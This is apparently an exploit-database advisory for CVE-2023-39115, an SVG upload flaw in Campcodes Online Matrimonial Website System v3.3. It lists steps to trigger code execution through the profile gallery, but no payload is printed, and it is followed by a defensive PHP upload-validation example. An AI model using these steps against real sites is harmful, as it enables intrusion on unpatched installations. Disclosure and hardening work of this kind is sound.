Campcodes Online Matrimonial Website System v3.3: code execution via malicious SVG file upload
Exploits / Vulnerability Discovered: 2023-08-04 | Type: webapps | Platform: php
This exploit / vulnerability (Campcodes Online Matrimonial Website System v3.3 code execution via malicious SVG file upload) is for educational purposes only; if you use it, you do so at your own risk!
# Exploit Title: Online Matrimonial Website System v3.3 - Code Execution via malicious SVG file upload
# Date: 3-8-2023
# Category: Web Application
# Exploit Author: Rajdip Dey Sarkar
# Version: 3.3
# Tested on: Windows/Kali
# CVE: CVE-2023-39115
Description:
----------------
An arbitrary file upload vulnerability in Campcodes Online Matrimonial
Website System Script v3.3 allows attackers to execute arbitrary code via
uploading a crafted SVG file.
- Log in with your credentials
- Navigate to this directory: /profile-settings
- Click on Gallery -> Add New Image -> Browser -> Add Files
- Choose the SVG file and upload it
- Click the image; the payload is triggered
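
The gallery upload in the steps above accepts an SVG, which the browser treats as an active document rather than as a bitmap. As an added example (not code from the advisory or from Campcodes), the following sketch shows a server-side upload check that decides the type from the file's bytes and allows only raster formats; the function name, field name, size limit and storage path are assumptions.

```php
<?php
// Added example: hardened gallery upload check (not Campcodes code).
// Assumed names: store_gallery_image(), field "gallery_image", the uploads path.

// Raster types only. SVG is deliberately absent because it can carry script.
const ALLOWED_TYPES = [
    'image/jpeg' => 'jpg',
    'image/png'  => 'png',
    'image/gif'  => 'gif',
    'image/webp' => 'webp',
];

/**
 * Validate an uploaded gallery image and return the server-chosen file name.
 * Throws RuntimeException when the upload must be rejected.
 */
function store_gallery_image(array $file, string $destDir): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('upload failed');
    }
    if ($file['size'] > 5 * 1024 * 1024) {   // assumed 5 MiB limit
        throw new RuntimeException('file too large');
    }

    // Decide the type from the bytes, never from $file['type'] or the client file name.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    $ext  = ALLOWED_TYPES[$mime] ?? null;
    if ($ext === null) {
        // image/svg+xml, text/xml, text/html and text/plain all end up here.
        throw new RuntimeException('file type not allowed');
    }

    // The file must also parse as an image with real dimensions.
    if (@getimagesize($file['tmp_name']) === false) {
        throw new RuntimeException('not a decodable image');
    }

    // Random server-side name; the extension comes from the detected type.
    $name = bin2hex(random_bytes(16)) . '.' . $ext;
    if (!move_uploaded_file($file['tmp_name'], rtrim($destDir, '/') . '/' . $name)) {
        throw new RuntimeException('could not store file');
    }
    return $name;
}

// Usage in the upload endpoint (field name and path are assumptions):
// $name = store_gallery_image($_FILES['gallery_image'], __DIR__ . '/uploads/gallery');
```

Serving stored files with `X-Content-Type-Options: nosniff` and from a directory where PHP execution is disabled limits the impact if a bad file is stored anyway.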